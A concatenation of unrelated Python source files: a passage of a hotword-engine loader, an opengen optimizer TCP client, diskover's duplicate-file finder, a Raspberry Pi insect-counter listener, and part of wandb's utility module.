                    hotword, module
                ))
                instance = None
            except Exception:
                LOG.exception(
                    'Could not create hotword. Falling back to default.')
                instance = None
            complete.set()

        Thread(target=initialize, daemon=True).start()
        if not complete.wait(INIT_TIMEOUT):
            LOG.info('{} is taking too long to load'.format(module))
            complete.set()
        return instance

    @classmethod
    def create_hotword(cls, hotword="hey boss", config=None,
                       lang="en-us", loop=None):
        # Resolve configuration, then try the configured module, then
        # pocketsphinx, then a bare default pocketsphinx engine.
        if not config:
            config = Configuration.get()['hotwords']
            config = config[hotword]
        module = config.get("module", "precise")
        return cls.load_module(module, hotword, config, lang, loop) or \
            cls.load_module('pocketsphinx', hotword, config, lang, loop) or \
            cls.CLASSES['pocketsphinx']()
|
optimizer_tcp_manager.py
|
import yaml
import os
import subprocess
import socket
import json
import logging
import time
import math
import pkg_resources
from threading import Thread
from retry import retry
from .solver_response import SolverResponse
class OptimizerTcpManager:
    """Client for TCP interface of parametric optimizers

    This class is used to start and stop a TCP server, which
    has been generated by <code>opengen</code>.
    """
    def __init__(self, optimizer_path=None, ip=None, port=None):
        """
        Constructs instance of <code>OptimizerTcpManager</code>

        There are three ways to use this constructor:

        - OptimizerTcpManager(optimizer_path): creates a TCP manager for a local
        TCP server using the default IP and port of that TCP server (specified
        upon code generation)
        - OptimizerTcpManager(optimizer_path, ip, port): creates a TCP manager
        for a local TCP server, but overrides the default IP and port. This way
        the user can set the address '0.0.0.0', so that the TCP server binds on
        all IPs, or '127.0.0.1' so that it is accessible only locally, or a VPN
        IP address, so that the optimizer is accessible only over a private
        network.
        - OptimizerTcpManager(ip, port): If a path is not provided, then the
        TCP manager can be used to connect to a remote TCP server, as a client,
        but cannot be used to start the server.

        Args:
            :param optimizer_path:
                path to auto-generated optimizer (just to be clear: this is
                the folder that contains <code>optimizer.yml</code>)
            :param ip:
                the user can provide the IP of a remote TCP server (must be up and
                running) so as to establish a remote connection. In that case `path`
                must be equal to `None` (see examples above)
            :param port: see ip

        Returns:
            New instance of <code>OptimizerTcpManager</code>
        """
        self.__optimizer_path = optimizer_path
        if optimizer_path is not None:
            # Local server: read TCP details and build metadata from optimizer.yml
            self.__optimizer_details = None  # create attribute (including IP and port)
            self.__load_tcp_details()
            # optional overrides of the auto-generated IP/port
            if ip is not None:
                self.__optimizer_details['tcp']['ip'] = ip
            if port is not None:
                self.__optimizer_details['tcp']['port'] = port
            # Check whether the optimizer was built with the current version of opengen
            # We can only check the optimizer version if the optimizer runs locally
            opengen_version = self.__optimizer_details['build']['opengen_version']
            current_opengen_version = pkg_resources.require("opengen")[0].version
            if current_opengen_version != opengen_version:
                # logging.warn is a deprecated alias of logging.warning
                logging.warning(
                    'the target optimizer was built with a different version of opengen (%s)' % opengen_version)
                logging.warning('you are running opengen version %s' % current_opengen_version)
        elif ip is not None and port is not None:
            # Remote server: we only know its address; start() is unavailable
            self.__optimizer_details = {"tcp": {"ip": ip, "port": port}}
        else:
            # If the optimizer path has not been provided, both the IP and the
            # port must be provided, otherwise, raise an exception
            raise Exception("Illegal arguments")
        logging.info("TCP/IP details: %s:%d",
                     self.__optimizer_details['tcp']['ip'],
                     self.__optimizer_details['tcp']['port'])
    def __load_tcp_details(self):
        """Populate optimizer details (TCP address, build info) from optimizer.yml."""
        yaml_file = os.path.join(self.__optimizer_path, "optimizer.yml")
        with open(yaml_file, 'r') as stream:
            self.__optimizer_details = yaml.safe_load(stream)
    @retry(tries=10, delay=1)
    def __obtain_socket_connection(self):
        """Connect to the configured address, retrying up to 10 times (1 s apart)."""
        tcp_data = self.__optimizer_details
        ip = tcp_data['tcp']['ip']
        port = tcp_data['tcp']['port']
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
        s.connect((ip, port))
        return s
    def __send_receive_data(self, text_to_send, buffer_size=512, max_data_size=1048576):
        """Send a request string and return the server's decoded reply.

        :param text_to_send: request payload (JSON string)
        :param buffer_size: chunk size used when reading the reply
        :param max_data_size: upper bound on the expected reply size
        """
        conn_socket = self.__obtain_socket_connection()
        try:
            conn_socket.sendall(text_to_send.encode())
            # half-close the connection so the server sees end-of-request
            conn_socket.shutdown(socket.SHUT_WR)
            max_read_rounds = math.ceil(max_data_size / buffer_size)
            data = b''
            for _i in range(max_read_rounds):
                data_chunk = conn_socket.recv(buffer_size)
                # Bug fix: recv() signals EOF with an empty bytes object,
                # never None, so the previous `is None` check never fired
                # and the loop spun through all read rounds after the
                # reply had ended.
                if not data_chunk:
                    break
                data += data_chunk
        finally:
            # close the socket even if sending/receiving raised
            conn_socket.close()
        return data.decode()
    def ping(self):
        """Pings the server

        Pings the server to check whether it is up and running
        """
        request = '{"Ping":1}'
        data = self.__send_receive_data(request)
        return json.loads(data)
    def __check_if_server_is_running(self):
        """Return True when a TCP connection to the configured address succeeds."""
        tcp_data = self.__optimizer_details
        ip = tcp_data['tcp']['ip']
        port = tcp_data['tcp']['port']
        # use a context manager so the probe socket is always closed
        # (it used to be leaked)
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0) as s:
            return 0 == s.connect_ex((ip, port))
    @property
    def details(self):
        """Optimizer details dictionary (includes the TCP IP and port)."""
        return self.__optimizer_details
    def start(self):
        """Starts the TCP server

        Note: this method starts a *local* server whose path must have been
        provided - we cannot start a remote server.

        The server starts on a separate thread, so this method does not block
        the execution of the caller's programme.
        """
        # Check if a path has been provided; if not, this manager is remote-only
        if self.__optimizer_path is None:
            raise Exception("No optimizer path provided - cannot start a remote server")
        # Server start data
        tcp_data = self.__optimizer_details
        ip = tcp_data['tcp']['ip']
        port = tcp_data['tcp']['port']
        # Refuse to start if something already listens on this address
        if self.__check_if_server_is_running():
            msg = "Port %d not available" % port
            raise Exception(msg)
        def threaded_start():
            # runs `cargo run` for the generated TCP interface crate and
            # blocks until the server process exits
            optimizer_details = self.__optimizer_details
            logging.info("Starting TCP/IP server at %s:%d (in a detached thread)",
                         ip, port)
            command = ['cargo', 'run', '-q']
            command += ["--release"] if optimizer_details['build']['build_mode'] == 'release' else []
            command += ['--', '--port=%d' % port, '--ip=%s' % ip]
            tcp_dir_name = "tcp_iface_" + optimizer_details['meta']['optimizer_name']
            tcp_iface_directory = os.path.join(self.__optimizer_path, tcp_dir_name)
            p = subprocess.Popen(command, cwd=tcp_iface_directory)
            p.wait()
        # start the server in a separate thread
        logging.info("Starting TCP/IP server thread")
        thread = Thread(target=threaded_start)
        thread.start()
        # ping the server until it responds so that we know it's
        # up and running (the connection helper retries internally)
        logging.info("Waiting for server to start")
        time.sleep(0.1)
        self.ping()
    def kill(self):
        """Kills the server"""
        logging.info("Killing server")
        request = '{"Kill":1}'
        self.__send_receive_data(request)
    def call(self, p, initial_guess=None,
             initial_y=None,
             initial_penalty=None,
             buffer_len=4096,
             max_data_size=1048576) -> SolverResponse:
        """Calls the server

        Consumes the parametric optimizer by providing a parameter vector
        and, optionally, an initial guess

        Args:
            p: vector of parameters (list of float)
            initial_guess: initial guess vector (list of float)
            initial_y: initial vector of Lagrange multipliers (list of float)
            initial_penalty: initial penalty parameter (float)
            buffer_len: buffer length used to read the server response
                (default value: 4096)
            max_data_size: maximum data size that is expected to be
                received from the TCP server (default value: 1048576)

        Returns:
            Instance of SolverResponse
        """
        # Build the JSON request by hand to keep the wire format identical
        logging.debug("Sending request to TCP/IP server")
        run_message = '{"Run" : {"parameter": ['
        run_message += ','.join(map(str, p))
        run_message += ']'
        if initial_guess is not None:
            run_message += ', "initial_guess": ['
            run_message += ','.join(map(str, initial_guess))
            run_message += ']'
        if initial_y is not None:
            run_message += ', "initial_lagrange_multipliers": ['
            run_message += ','.join(map(str, initial_y))
            run_message += ']'
        if initial_penalty is not None:
            run_message += ', "initial_penalty": ' + str(float(initial_penalty))
        run_message += '}}'
        data = self.__send_receive_data(run_message, buffer_len, max_data_size)
        return SolverResponse(json.loads(data))
|
diskover_dupes.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""diskover - Elasticsearch file system crawler
diskover is a file system crawler that index's
your file metadata into Elasticsearch.
See README.md or https://github.com/shirosaidev/diskover
for more information.
Copyright (C) Chris Park 2017-2019
diskover is released under the Apache 2.0 license. See
LICENSE for the full license text.
"""
from diskover import index_bulk_add, config, es, progress_bar, redis_conn, worker_bots_busy, ab_start, adaptive_batch
from diskover_bot_module import dupes_process_hashkey
from rq import SimpleWorker
import base64
import hashlib
import os
import time
import warnings
import dateutil.parser
try:
from Queue import Queue as pyQueue
except ImportError:
from queue import Queue as pyQueue
from threading import Thread
from multiprocessing import cpu_count
def index_dupes(hashgroup, cliargs):
    """This is the ES dupe_md5 tag update function.
    It updates a file's dupe_md5 field to be md5sum of file
    if it's marked as a duplicate.
    """
    md5 = hashgroup['md5sum']
    # one bulk "update" action per file in the duplicate group
    actions = [
        {
            '_op_type': 'update',
            '_index': cliargs['index'],
            '_type': 'file',
            '_id': f['id'],
            'doc': {'dupe_md5': md5}
        }
        for f in hashgroup['files']
    ]
    if actions:
        index_bulk_add(es, actions, config, cliargs)
def start_file_threads():
    """Spawn the configured number of daemon md5 hashing worker threads."""
    for _ in range(config['dupes_threads']):
        worker = Thread(target=md5_hasher)
        worker.daemon = True
        worker.start()
def md5_hasher():
    """Worker thread loop: md5-hash files pulled from file_in_thread_q.

    Consumes (filename, atime, mtime, cliargs) tuples, hashes the file in
    read_size chunks and pushes (filename, md5) onto file_out_thread_q.
    Runs forever; intended to be started as a daemon thread.
    """
    while True:
        item = file_in_thread_q.get()
        filename, atime, mtime, cliargs = item
        # get md5 sum, don't load whole file into memory,
        # load in n bytes at a time (read_size blocksize)
        try:
            read_size = config['md5_readsize']
            hasher = hashlib.md5()
            with open(filename, 'rb') as f:
                buf = f.read(read_size)
                while len(buf) > 0:
                    hasher.update(buf)
                    buf = f.read(read_size)
            md5 = hasher.hexdigest()
            # restore times (atime/mtime) changed by reading the file
            if config['dupes_restoretimes'] == "true":
                atime_unix = dateutil.parser.isoparse(atime).timestamp()
                mtime_unix = dateutil.parser.isoparse(mtime).timestamp()
                try:
                    os.utime(filename, (atime_unix, mtime_unix))
                except (OSError, IOError) as e:
                    warnings.warn("OS/IO Exception caused by: %s" % e)
                    pass
                except Exception as e:
                    warnings.warn("Exception caused by: %s" % e)
                    pass
        except (OSError, IOError) as e:
            # unreadable file: warn, mark the queue item done, move on
            warnings.warn("OS/IO Exception caused by: %s" % e)
            file_in_thread_q.task_done()
            continue
        except Exception as e:
            warnings.warn("Exception caused by: %s" % e)
            file_in_thread_q.task_done()
            continue
        file_out_thread_q.put((filename, md5))
        file_in_thread_q.task_done()
def verify_dupes(hashgroup, cliargs):
    """This is the verify dupes function.
    It processes files in hashgroup to verify if they are duplicate.
    The first few bytes at beginning and end of files are
    compared and if same, a md5 check is run on the files.
    If the files are duplicate, their dupe_md5 field
    is updated to their md5sum.
    Returns hashgroup (or None when fewer than 2 duplicates remain).
    """
    # number of bytes to check at start and end of file
    read_bytes = config['dupes_checkbytes']
    # min bytes to read of file size less than above
    min_read_bytes = 1
    # Add first and last few bytes for each file to dictionary
    # create a new dictionary with files that have same byte hash
    hashgroup_bytes = {}
    for file in hashgroup['files']:
        try:
            f = open(file['filename'], 'rb')
        except (OSError, IOError) as e:
            warnings.warn("OS/IO Exception caused by: %s" % e)
            continue
        except Exception as e:
            warnings.warn("Exception caused by: %s" % e)
            continue
        # check if files is only 1 byte
        try:
            bytes_f = base64.b64encode(f.read(read_bytes))
        except (IOError, OSError):
            pass
        # NOTE(review): this second read always executes (it is NOT inside
        # the except handler above), so bytes_f is overwritten with the byte
        # AFTER the first read_bytes rather than the file head — confirm
        # whether it was meant as a fallback for tiny files only.
        try:
            bytes_f = base64.b64encode(f.read(min_read_bytes))
        except Exception as e:
            warnings.warn("Exception caused by: %s" % e)
            continue
        try:
            f.seek(-read_bytes, os.SEEK_END)
            bytes_l = base64.b64encode(f.read(read_bytes))
        except (IOError, OSError):
            pass
        # NOTE(review): same always-executed fallback pattern for the tail.
        try:
            f.seek(-min_read_bytes, os.SEEK_END)
            bytes_l = base64.b64encode(f.read(min_read_bytes))
        except Exception as e:
            warnings.warn("Exception caused by: %s" % e)
            continue
        f.close()
        # restore times (atime/mtime)
        if config['dupes_restoretimes'] == "true":
            atime_unix = dateutil.parser.isoparse(file['atime']).timestamp()
            mtime_unix = dateutil.parser.isoparse(file['mtime']).timestamp()
            try:
                os.utime(file['filename'], (atime_unix, mtime_unix))
            except (OSError, IOError) as e:
                warnings.warn("OS/IO Exception caused by: %s" % e)
                pass
            except Exception as e:
                warnings.warn("Exception caused by: %s" % e)
                pass
        # create hash of bytes
        bytestring = str(bytes_f) + str(bytes_l)
        bytehash = hashlib.md5(bytestring.encode('utf-8')).hexdigest()
        # create new key for each bytehash and
        # set value as new list and add file
        hashgroup_bytes.setdefault(bytehash, []).append((file['filename'], file['atime'], file['mtime']))
    # remove any bytehash key that only has 1 item (no duplicate)
    for key, value in list(hashgroup_bytes.items()):
        if len(value) < 2:
            filename = value[0][0]
            del hashgroup_bytes[key]
            # remove file from hashgroup
            for i in range(len(hashgroup['files'])):
                if hashgroup['files'][i]['filename'] == filename:
                    del hashgroup['files'][i]
                    break
    # run md5 sum check if bytes were same
    hashgroup_md5 = {}
    # do md5 check on files with same byte hashes
    for key, value in list(hashgroup_bytes.items()):
        for file in value:
            filename, atime, mtime = file
            # add file into thread queue
            file_in_thread_q.put((filename, atime, mtime, cliargs))
    # wait for threads to finish
    file_in_thread_q.join()
    # get all files and add to tree_files
    while file_out_thread_q.qsize():
        item = file_out_thread_q.get()
        filename, md5 = item
        # create new key for each md5 sum and set value as new list and
        # add file
        hashgroup_md5.setdefault(md5, []).append(filename)
    # remove any md5sum key that only has 1 item (no duplicate)
    for key, value in list(hashgroup_md5.items()):
        if len(value) < 2:
            filename = value[0]
            del hashgroup_md5[key]
            # remove file from hashgroup
            for i in range(len(hashgroup['files'])):
                if hashgroup['files'][i]['filename'] == filename:
                    del hashgroup['files'][i]
                    break
        else:
            md5 = key
    if len(hashgroup['files']) >= 2:
        # update hashgroup's md5sum key
        hashgroup['md5sum'] = md5
        return hashgroup
    else:
        return None
def populate_hashgroup(key, cliargs):
    """Searches ES for all files matching hashgroup key (filehash)
    and returns dict containing matching files.
    Return None if only 1 file matching.
    """
    query = {
        "_source": ["path_parent", "filename", "last_access", "last_modified"],
        "query": {
            "bool": {
                "must": {
                    "term": {"filehash": key}
                }
            }
        }
    }
    res = es.search(index=cliargs['index'], doc_type="file", size="1000", body=query,
                    request_timeout=config['es_timeout'])
    hits = res['hits']['hits']
    # a single hit means the file has no duplicates
    if len(hits) == 1:
        return None
    # collect id, full path and times for every matching file
    matching_files = [
        {'id': hit['_id'],
         'filename': hit['_source']['path_parent'] + "/" + hit['_source']['filename'],
         'atime': hit['_source']['last_access'],
         'mtime': hit['_source']['last_modified']}
        for hit in hits
    ]
    return {'filehash': key, 'files': matching_files, 'md5sum': ''}
def dupes_finder(es, q, cliargs, logger):
    """This is the duplicate file finder function.
    It searches Elasticsearch for files that have the same filehashes
    and adds file hash groups to Queue.
    """
    logger.info('Searching %s for all duplicate files...', cliargs['index'])
    # initial batch size; adaptive batching may grow it during the run
    if cliargs['adaptivebatch']:
        batchsize = ab_start
    else:
        batchsize = cliargs['batchsize']
    if cliargs['verbose'] or cliargs['debug']:
        logger.info('Batch size: %s' % batchsize)
    # first get all the filehashes with files that have a hardlinks count of 1
    data = {
        "size": 0,
        "query": {
            "bool": {
                "must": {
                    "term": {"hardlinks": 1}
                },
                "filter": {
                    "range": {
                        "filesize": {
                            "lte": config['dupes_maxsize'],
                            "gte": cliargs['minsize']
                        }
                    }
                }
            }
        }
    }
    # refresh index
    es.indices.refresh(index=cliargs['index'])
    # search es and start scroll
    res = es.search(index=cliargs['index'], scroll='1m', doc_type='file', size=config['es_scrollsize'],
                    body=data, request_timeout=config['es_timeout'])
    filehashlist = []
    filehashcount = 0
    while res['hits']['hits'] and len(res['hits']['hits']) > 0:
        for hit in res['hits']['hits']:
            filehash = hit['_source']['filehash']
            # de-duplicate hashes (NOTE(review): list membership is O(n) per hit)
            if filehash not in filehashlist:
                filehashlist.append(filehash)
                filehashcount += 1
                filehashlist_len = len(filehashlist)
                if filehashlist_len >= batchsize:
                    # send to rq for bots to process file hashkey list
                    q.enqueue(dupes_process_hashkey, args=(filehashlist, cliargs,), result_ttl=config['redis_ttl'])
                    if cliargs['debug'] or cliargs['verbose']:
                        logger.info("enqueued batchsize: %s (batchsize: %s)" % (filehashlist_len, batchsize))
                    del filehashlist[:]
                    if cliargs['adaptivebatch']:
                        batchsize = adaptive_batch(q, cliargs, batchsize)
                        if cliargs['debug'] or cliargs['verbose']:
                            logger.info("batchsize set to: %s" % batchsize)
        # use es scroll api
        res = es.scroll(scroll_id=res['_scroll_id'], scroll='1m',
                        request_timeout=config['es_timeout'])
    # enqueue dir calc job for any remaining in dirlist
    if len(filehashlist) > 0:
        q.enqueue(dupes_process_hashkey, args=(filehashlist, cliargs,), result_ttl=config['redis_ttl'])
    logger.info('%s file hashes have been enqueued' % filehashcount)
    # show a progress bar unless quiet/debug/verbose output is requested
    if not cliargs['quiet'] and not cliargs['debug'] and not cliargs['verbose']:
        bar = progress_bar('Checking')
        bar.start()
    else:
        bar = None
    # update progress bar until bots are idle and queue is empty
    while worker_bots_busy([q]):
        if bar:
            q_len = len(q)
            try:
                bar.update(q_len)
            except (ZeroDivisionError, ValueError):
                bar.update(0)
        time.sleep(1)
    if bar:
        bar.finish()
# set up python Queue for threaded file md5 checking
# (module level so verify_dupes and the md5_hasher workers share them)
file_in_thread_q = pyQueue()
file_out_thread_q = pyQueue()
# spawn the daemon hashing threads as soon as this module is imported
start_file_threads()
|
listener.py
|
#! /usr/bin/env python3
"""
This is the main pi module. Only works on a raspberry pi (4).
usage: python3 listener.py [-h] [--dirpath DIRPATH] [--modelpath MODELPATH]
[--tokenfile TOKENFILE] [--permanent PERMANENT]
[--server_url SERVER_URL] [--threshold THRESHOLD]
[--device DEVICE] [--target_rate TARGET_RATE]
[--rec_rate REC_RATE] [--samples SAMPLES]
[--buffer_size BUFFER_SIZE] [--address ADDRESS]
[--use_sensor USE_SENSOR]
optional arguments:
-h, --help show this help message and exit
--dirpath DIRPATH Verzeichnis in dem die Dateien abgespeichert
werden.(Wird nur benutzt wenn die permanent FLAG
gesetzt ist, ansonsten wird auf eine RAM-DISK
geschrieben und die Dateien nach dem Absenden
gelöscht.
--modelpath MODELPATH
Pfad an dem das Modell und die zugehörige JSON
abgespeichert ist.
--tokenfile TOKENFILE
Name des Tokenfiles des Sensors.
--permanent PERMANENT
Gibt an ob die Daten permanent gespeichert werden oder
nach dem Senden gelöscht werden.
--server_url SERVER_URL
URL des InsectCounter Projekts, e.g.
https://insectcounter.zapto.org oder
http://localhost:3000 wenn der Server lokal läuft
--threshold THRESHOLD
Kleinster RMS um die Aufnahme zu starten.
--device DEVICE Port des Audio Devices.
--target_rate TARGET_RATE
Samplespeed in Hz des Ausgabe Files.
--rec_rate REC_RATE Samplespeed in Hz der eingehenden Aufname.
--samples SAMPLES Anzahl an Samples in einer Aufnahme.
--buffer_size BUFFER_SIZE
Größe des Buffer.
--address ADDRESS Adresse des BME280.
--use_sensor USE_SENSOR
Gibt an ob der BME280 Sensor benutzt werden soll.
"""
import os
import argparse
from multiprocessing import Process
from watchdog.events import PatternMatchingEventHandler
from watchdog.observers import Observer
from classifier.network import NetworkModule
from classifier.classifier import ClassifierModule
from recording.recorder import Recorder
def str2bool(v):
    """Parse a boolean-ish command line string into a bool (argparse type helper).

    Accepts real bools unchanged; raises ArgumentTypeError otherwise.
    """
    if isinstance(v, bool):
        return v
    lowered = v.lower()
    if lowered in ('yes', 'true', 't', 'y', '1'):
        return True
    if lowered in ('no', 'false', 'f', 'n', '0'):
        return False
    raise argparse.ArgumentTypeError('Boolean value expected.')
class Listener(PatternMatchingEventHandler):
    """
    Class that can react to new files being generated in the file system.
    """
    def __init__(self, args, patterns=None, ignore_patterns=None,
                 ignore_directories=False, case_sensitive=False):
        """
        Constructs a listener that reacts to new wav files being created.
        :param args: An argparse object containing the relevant paths.
        :param patterns: File patterns to react to (defaults to ["*.wav"]).
        :param ignore_patterns: Patterns to ignore.
        :param ignore_directories: Whether directory events are ignored.
        :param case_sensitive: Whether pattern matching is case sensitive.
        """
        # Bug fix: these keyword arguments used to be accepted but silently
        # discarded (hard-coded values were passed to the base class). They
        # are now forwarded; the defaults reproduce the old behavior.
        super().__init__(patterns=patterns if patterns is not None else ["*.wav"],
                         ignore_patterns=ignore_patterns,
                         ignore_directories=ignore_directories,
                         case_sensitive=case_sensitive)
        # Create the classifier module
        self.clf = ClassifierModule(args.dirpath, args.modelpath, args.permanent)
        # Create the network module
        self.nw = NetworkModule(args.dirpath, args.tokenfile, args.server_url)
    def process(self, event):
        """
        Process the newly generated wav file by sending it through the classifier and the result to the server.
        :param event: Name of the newly generated wav file.
        """
        if self.clf and self.nw:
            # the file name (without extension) encodes the recording timestamp
            timestamp = os.path.splitext(os.path.basename(event.src_path))[0]
            additional_info = self.clf.get_additional_info(timestamp)
            label, score = self.clf.classify(event.src_path)
            self.nw.send_http(label, timestamp, additional_info, score)
            self.clf.remove_from_disk(os.path.normpath(event.src_path))
    def on_created(self, event):
        """
        Reacts on newly created files.
        :param event: Information about a new file given by the OS.
        """
        self.process(event)
def main(args):
    """
    Creates the recorder to capture wingbeats data and creates an observer to react to new files being created.
    :param args: An argparse object containing all relevant arguments.
    """
    # non-permanent mode writes to a RAM disk; files are removed after upload
    if not args.permanent:
        args.dirpath = "/mnt/ramdisk"
    # Create a listener
    listener = Listener(args)
    # Create an observer looking for new wav files in the given directory.
    observer = Observer()
    observer.schedule(listener, args.dirpath)
    observer.start()
    # Creates the recorder to capture wingbeats data from the microphone.
    recorder = Recorder(args.dirpath, args.threshold, args.device, args.rec_rate, args.target_rate, args.samples,
                        args.buffer_size, args.address, args.use_sensor)
    # run the blocking recorder loop in its own process and wait for it
    p = Process(target=recorder.listen)
    p.start()
    p.join()
    observer.join()
if __name__ == "__main__":
    # CLI entry point: parse arguments (help texts are in German) and start the pipeline.
    parser = argparse.ArgumentParser()
    parser.add_argument("--dirpath", default="../savedfiles", type=str,
                        help="Verzeichnis in dem die Dateien abgespeichert werden."
                             "(Wird nur benutzt wenn die permanent FLAG gesetzt ist, "
                             "ansonsten wird auf eine RAM-DISK geschrieben und die Dateien nach dem Absenden gelöscht.")
    parser.add_argument("--modelpath", default="../model", type=str,
                        help="Pfad an dem das Modell und die zugehörige JSON abgespeichert ist.")
    parser.add_argument("--tokenfile", default="../model/token.json", type=str,
                        help="Name des Tokenfiles des Sensors.")
    parser.add_argument("--permanent", default=False, type=str2bool,
                        help="Gibt an ob die Daten permanent gespeichert werden oder nach dem Senden gelöscht werden.")
    parser.add_argument("--server_url", default="http://192.168.2.104:3000", type=str,
                        help="URL des InsectCounter Projekts, e.g. https://insectcounter.zapto.org oder "
                             "http://localhost:3000 wenn der Server lokal läuft")
    parser.add_argument("--threshold", default=10, type=int, help="Kleinster RMS um die Aufnahme zu starten.")
    parser.add_argument("--device", default=2, type=int, help="Port des Audio Devices.")
    parser.add_argument("--target_rate", default=8000, type=int, help="Samplespeed in Hz des Ausgabe Files.")
    parser.add_argument("--rec_rate", default=44100, type=int, help="Samplespeed in Hz der eingehenden Aufname.")
    parser.add_argument("--samples", default=5000, type=int, help="Anzahl an Samples in einer Aufnahme.")
    parser.add_argument("--buffer_size", default=4096, type=int, help="Größe des Buffer.")
    parser.add_argument("--address", default=0x76, type=int, help="Adresse des BME280.")
    parser.add_argument("--use_sensor", default=False, type=str2bool,
                        help="Gibt an ob der BME280 Sensor benutzt werden soll.")
    args = parser.parse_args()
    main(args)
|
util.py
|
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
import base64
import colorsys
import codecs
import errno
import hashlib
import json
import getpass
import logging
import os
import re
import shlex
import subprocess
import sys
import threading
import time
import random
import platform
import stat
import shortuuid
import importlib
import types
import yaml
import numbers
from datetime import date, datetime
import click
import requests
import six
from six.moves import queue
import textwrap
from sys import getsizeof
from collections import namedtuple, Mapping, Sequence
from importlib import import_module
import sentry_sdk
from sentry_sdk import capture_exception
from sentry_sdk import capture_message
from wandb.env import error_reporting_enabled
import wandb
import wandb.core
from wandb import io_wrap
from wandb import wandb_dir
from wandb.apis import CommError
from wandb import wandb_config
from wandb import env
logger = logging.getLogger(__name__)
# modules that failed to import once; get_module() will not retry these
_not_importable = set()
OUTPUT_FNAME = 'output.log'
DIFF_FNAME = 'diff.patch'
# these match the environments for gorilla
if wandb.core.IS_GIT:
    SENTRY_ENV = 'development'
else:
    SENTRY_ENV = 'production'
# initialize Sentry crash reporting unless the user opted out via env var
if error_reporting_enabled():
    sentry_sdk.init("https://f84bb3664d8e448084801d9198b771b2@sentry.io/1299483",
                    release=wandb.__version__,
                    default_integrations=False,
                    environment=SENTRY_ENV)
def sentry_message(message):
    """Send *message* to Sentry when error reporting is enabled."""
    if not error_reporting_enabled():
        return
    capture_message(message)
def sentry_exc(exc):
    """Report an exception (or an error string) to Sentry when enabled."""
    if not error_reporting_enabled():
        return
    # plain strings are wrapped so Sentry receives a real exception object
    if isinstance(exc, six.string_types):
        exc = Exception(exc)
    capture_exception(exc)
def sentry_reraise(exc):
    """Re-raise an exception after logging it to Sentry

    Use this for top-level exceptions when you want the user to see the traceback.

    Must be called from within an exception handler.
    """
    sentry_exc(exc)
    # this will messily add this "reraise" function to the stack trace
    # but hopefully it's not too bad
    # (six.reraise preserves the original traceback on py2 and py3)
    six.reraise(type(exc), exc, sys.exc_info()[2])
def vendor_import(name):
    """This enables us to use the vendor directory for packages we don't depend on"""
    vendor_dir = os.path.join(os.path.abspath(os.path.dirname(__file__)), 'vendor')
    # TODO: this really needs to go, was added for CI
    if sys.modules.get("prompt_toolkit"):
        stale = [k for k in sys.modules if k.startswith("prompt_toolkit")]
        for k in stale:
            del sys.modules[k]
    # prefer the vendored copy over any installed one
    sys.path.insert(1, vendor_dir)
    return import_module(name)
def get_module(name, required=None):
    """
    Return module or None. Absolute import is required.

    :param (str) name: Dot-separated module path. E.g., 'scipy.stats'.
    :param (str) required: A string to raise a ValueError if missing
    :return: (module|None) If import succeeds, the module will be returned.
    """
    if name not in _not_importable:
        try:
            return import_module(name)
        except Exception:
            # remember the failure so we only attempt (and log) once
            _not_importable.add(name)
            msg = "Error importing optional module {}".format(name)
            if required:
                logger.exception(msg)
    if required and name in _not_importable:
        raise wandb.Error(required)
class LazyLoader(types.ModuleType):
    """Lazily import a module, mainly to avoid pulling in large dependencies.

    we use this for tensorflow and other optional libraries primarily at the top module level
    """
    # The lint error here is incorrect.
    def __init__(self, local_name, parent_module_globals, name, warning=None):  # pylint: disable=super-on-old-class
        self._local_name = local_name
        self._parent_module_globals = parent_module_globals
        self._warning = warning
        super(LazyLoader, self).__init__(name)
    def _load(self):
        """Import the real module, patch it into the parent namespace and
        copy its attributes onto this proxy so later lookups are direct."""
        module = importlib.import_module(self.__name__)
        self._parent_module_globals[self._local_name] = module
        if self._warning:
            print(self._warning)
            # warn at most once
            self._warning = None
        # After this, attribute lookups hit __dict__ and skip __getattr__.
        self.__dict__.update(module.__dict__)
        return module
    def __getattr__(self, item):
        return getattr(self._load(), item)
    def __dir__(self):
        return dir(self._load())
class PreInitObject(object):
    """Placeholder that raises wandb.Error on any public access before wandb.init()."""
    def __init__(self, name):
        self._name = name
    def __getitem__(self, key):
        raise wandb.Error(
            'You must call wandb.init() before {}["{}"]'.format(self._name, key))
    def __setitem__(self, key, value):
        raise wandb.Error(
            'You must call wandb.init() before {}["{}"]'.format(self._name, key))
    def __setattr__(self, key, value):
        # private (underscore) attributes are stored normally
        if key.startswith("_"):
            return object.__setattr__(self, key, value)
        raise wandb.Error(
            'You must call wandb.init() before {}.{}'.format(self._name, key))
    def __getattr__(self, key):
        if key.startswith("_"):
            raise AttributeError()
        raise wandb.Error(
            'You must call wandb.init() before {}.{}'.format(self._name, key))
# numpy is optional; np stays None when it is not installed
np = get_module('numpy')
MAX_SLEEP_SECONDS = 60 * 5
# TODO: Revisit these limits
VALUE_BYTES_LIMIT = 100000
def get_full_typename(o):
    """Return the fully qualified type name of *o*; modules use their own name.

    We determine types based on type names so we don't have to import
    (and therefore depend on) PyTorch, TensorFlow, etc.
    """
    instance_name = o.__class__.__module__ + "." + o.__class__.__name__
    if instance_name not in ("builtins.module", "__builtin__.module"):
        return instance_name
    return o.__name__
def get_h5_typename(o):
    """Map *o* to the type name used for h5 serialization.

    TF and torch tensors get canonical short names; everything else is
    reported as "<top-level package>.<class name>".
    """
    typename = get_full_typename(o)
    if is_tf_tensor_typename(typename):
        return "tensorflow.Tensor"
    if is_pytorch_tensor_typename(typename):
        return "torch.Tensor"
    return o.__class__.__module__.split('.')[0] + "." + o.__class__.__name__
def is_tf_tensor(obj):
    """True if obj is a tensorflow.Tensor (imports tensorflow lazily)."""
    import tensorflow
    return isinstance(obj, tensorflow.Tensor)
def is_tf_tensor_typename(typename):
    """True for tensorflow Tensor/Variable type names."""
    return typename.startswith('tensorflow.') and ('Tensor' in typename or 'Variable' in typename)
def is_tf_eager_tensor_typename(typename):
    """True for tensorflow EagerTensor type names."""
    return typename.startswith('tensorflow.') and ('EagerTensor' in typename)
def is_pytorch_tensor(obj):
    """True if obj is a torch.Tensor (imports torch lazily)."""
    import torch
    return isinstance(obj, torch.Tensor)
def is_pytorch_tensor_typename(typename):
    """True for torch Tensor/Variable type names."""
    return typename.startswith('torch.') and ('Tensor' in typename or 'Variable' in typename)
def is_pandas_data_frame_typename(typename):
    """True for pandas DataFrame type names."""
    return typename.startswith('pandas.') and 'DataFrame' in typename
